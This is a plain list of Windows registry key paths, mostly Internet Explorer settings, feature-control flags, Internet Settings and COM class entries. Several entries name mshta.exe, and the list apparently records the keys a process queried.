HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel\Theme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Theme\FontScale
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OPTICAL_ZOOM
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_OPTICAL_ZOOM
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Version Vector\VML
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_CURRENT_USER\Software\Classes\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\Software\Classes\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AvoidKnownFolderCaching
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AvoidKnownFolderCaching
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PropertyBag
HKEY_USERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_CURRENT_USER\Software\Classes\AppID\mshta.exe
HKEY_LOCAL_MACHINE\Software\Classes\AppID\mshta.exe
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\Interface\{a168aadc-1674-49da-ad4f-4f27df8760d0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{a168aadc-1674-49da-ad4f-4f27df8760d0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{a168aadc-1674-49da-ad4f-4f27df8760d0}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\AppID
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Elevation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableZlibDeflate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
